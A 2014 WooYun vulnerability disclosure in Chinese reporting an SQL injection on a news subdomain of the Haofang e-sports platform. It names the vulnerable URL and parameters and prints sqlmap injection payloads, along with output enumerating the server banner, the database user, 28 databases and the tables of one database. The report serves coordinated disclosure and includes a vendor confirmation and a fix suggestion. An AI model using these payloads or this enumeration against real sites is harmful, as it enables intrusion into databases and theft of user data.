当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077662

漏洞标题:浩方电竞平台分站sql注入漏洞

相关厂商:边锋网络

漏洞作者: xyang

提交时间:2014-09-29 19:00

修复时间:2014-11-13 19:02

公开时间:2014-11-13 19:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-29: 细节已通知厂商并且等待厂商处理中
2014-09-30: 厂商已经确认,细节仅向厂商公开
2014-10-10: 细节向核心白帽子及相关领域专家公开
2014-10-20: 细节向普通白帽子公开
2014-10-30: 细节向实习白帽子公开
2014-11-13: 细节向公众公开

简要描述:

某国内大型电竞平台分站sql注入

详细说明:

最开始玩DOTA就是在浩方上玩的:)
漏洞地址:

http://news.cga.com.cn/app/list.aspx?ItemId=13&categoryid=4


注入参数:

ItemID,categoryid


payload:

---
Place: GET
Parameter: ItemId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ItemId=13) AND 6213=6213 AND (2258=2258&categoryid=4
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ItemId=13); WAITFOR DELAY '0:0:5'--&categoryid=4
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ItemId=13) WAITFOR DELAY '0:0:5'--&categoryid=4
Place: GET
Parameter: categoryid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ItemId=13&categoryid=4) AND 9641=9641 AND (4531=4531
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ItemId=13&categoryid=4); WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ItemId=13&categoryid=4) WAITFOR DELAY '0:0:5'--
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: categoryid, type: Unescaped numeric (default)
[1] place: GET, parameter: ItemId, type: Unescaped numeric
[q] Quit


当前库信息:

[03:16:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[03:16:39] [INFO] fetching current user
[03:16:39] [INFO] resumed: UnionNewWebDBUser
current user: 'UnionNewWebDBUser'
[03:16:39] [INFO] fetching current database
[03:16:39] [WARNING] running in a single-thread mode. Please consider usage of option '--
threads' for faster data retrieval
[03:16:39] [INFO] retrieved:
[03:16:39] [WARNING] reflective value(s) found and filtering out
UnionNews
current database: 'UnionNews'


服务器banner信息:

banner:
---
Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0 (X64)
Jun 17 2011 00:54:03
Copyright (c) Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
---


跑库:

available databases [28]:
[*] DntForum
[*] HF_Maps
[*] HF_Match
[*] HFActivity
[*] HFAwardSys
[*] HFClanSys
[*] HFEvent2013
[*] HFEvent2013Apr
[*] HFGoldenLeague
[*] HFHelpSys
[*] HFNetBar
[*] HFReportComplain
[*] HFWebApp
[*] HFZhanLing
[*] JDDB
[*] ManagementSystem
[*] master
[*] model
[*] msdb
[*] Nest
[*] pv
[*] QuestionnaireSys
[*] RencunBeckon
[*] RencunDIY
[*] RencunGift
[*] tempdb
[*] UnionNews
[*] Woool2WebDB


跑表

[03:40:54] [INFO] retrieved: dbo.Admin
[03:41:25] [INFO] retrieved: dbo.Admin_Category
[03:42:05] [INFO] retrieved: dbo.Admin_Item
[03:42:29] [INFO] retrieved: dbo.Admin_Permission
[03:43:10] [INFO] retrieved: dbo.Admin_Tag
[03:43:28] [INFO] retrieved: dbo.Admin_Template
[03:44:04] [INFO] retrieved: dbo.AspNet_SqlCacheTablesForChangeNotification
[03:46:28] [INFO] retrieved: dbo.Category
[03:47:05] [INFO] retrieved: dbo.comd_list
[03:47:40] [INFO] retrieved: dbo.Item
[03:47:59] [INFO] retrieved: dbo.jiaozhu
[03:48:30] [INFO] retrieved: dbo.lunhui
[03:48:57] [INFO] retrieved: dbo.News
[03:49:18] [INFO] retrieved: dbo.News_Comment
[03:49:49] [INFO] retrieved: dbo.News_v
[03:50:00] [INFO] retrieved: dbo.Pic
[03:50:16] [INFO] retrieved: dbo.Reg_Arrt
[03:50:45] [INFO] retrieved: dbo.Tag
[03:51:01] [INFO] retrieved: dbo.Template
[03:51:29] [INFO] retrieved: dbo.Vote
[03:51:44] [INFO] retrieved: dbo.Vote_items
[03:52:13] [INFO] retrieved: dbo.Vote_logs
Database: UnionNews
[22 tables]
+--------------------------------------------+
| Admin |
| Admin_Category |
| Admin_Item |
| Admin_Permission |
| Admin_Tag |
| Admin_Template |
| AspNet_SqlCacheTablesForChangeNotification |
| Category |
| Item |
| News |
| News_Comment |
| News_v |
| Pic |
| Reg_Arrt |
| Tag |
| Template |
| Vote |
| Vote_items |
| Vote_logs |
| comd_list |
| jiaozhu |
| lunhui |
+--------------------------------------------+

漏洞证明:

好多数据表不知道干嘛的。。。继续深入下去会影响到平台玩家吗?好激动,不深入了
我只是想知道挖掘机技术到底哪家强?

修复方案:

参数类型增加判断、过滤
:)

版权声明:转载请注明来源 xyang@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-09-30 08:52

厂商回复:

谢谢xyang的漏洞。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-09-29 10:22 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    我说我的cs账号怎么被人盗了,终于找到你了……